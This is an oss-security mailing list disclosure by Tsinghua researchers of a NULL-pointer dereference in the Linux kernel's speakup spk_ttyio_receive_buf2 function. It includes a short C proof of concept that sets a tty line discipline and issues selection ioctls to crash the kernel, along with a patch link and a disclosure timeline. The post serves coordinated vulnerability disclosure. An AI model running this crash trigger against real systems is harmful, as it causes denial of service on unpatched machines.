Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Mon, 7 Dec 2020 10:20:44 +0800
From: Shisong Qin <qinshisong1205@...il.com>
To: oss-security@...ts.openwall.com
Cc: nopitydays@...il.com
Subject: Linux kernel NULL-ptr deref bug in spk_ttyio_receive_buf2

Hi,

Recently we found another NULL-ptr deref BUG in spk_ttyio.c in the latest
Linux kernel(5.9.11 is the latest at that now). In the
spk_ttyio_receive_buf2() function, it would dereference spk_ttyio_synth
without checking whether it is NULL or not, and may lead to a NULL-ptr
deref crash.

This bug could be reproduced in the Linux kernel (e.g. 5.9.11) with
CONFIG_ACCESSIBILITY=y, CONFIG_SPEAKUP=y and CONFIG_KASAN=y, and here is a
simple poc:

#define _GNU_SOURCE

#include <dirent.h>
#include <endian.h>
#include <errno.h>
#include <fcntl.h>
#include <signal.h>
#include <stdarg.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <time.h>
#include <unistd.h>

#pragma pack(1)
typedef struct {
        char subcode;
        short xs, ys, xe, ye;
        short sel_mode;
} sel_struct;

int main(int argc, char const *argv[]) {

    int disc = 0x1a;
    int fd = open("/dev/tty1", 0, 0);
    ioctl(fd, 0x5423, &disc);

    sel_struct sel;
    sel.subcode = 2;
    sel.xs = sel.ys = sel.xe = sel.ye = 0;
    sel.sel_mode = 0x0; // sel_mode = 0x0/0x1/0x2 could trigger this
NULL-ptr dereference bug
    ioctl(fd, 0x541c, &sel);
    char data = 3;
    ioctl(fd, 0x541c, &data);
    return 0;
}

Here is the commit to patch this BUG:
https://git.kernel.org/pub/scm/linux/kernel/git/gregkh/char-misc.git/commit/?h=char-misc-linus&id=f0992098cadb4c9c6a00703b66cafe604e178fea

Timeline:
* 2020/11/24 - Vulnerability reported to security@...nel.org
* 2020/11/29 - Vulnerability confirmed, and reported to
linux-distros@...openwall.org.
* 2020/12/7 - Vulnerability opened.

Thanks, Shisong Qin and Bodong Zhao, Tsinghua University

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.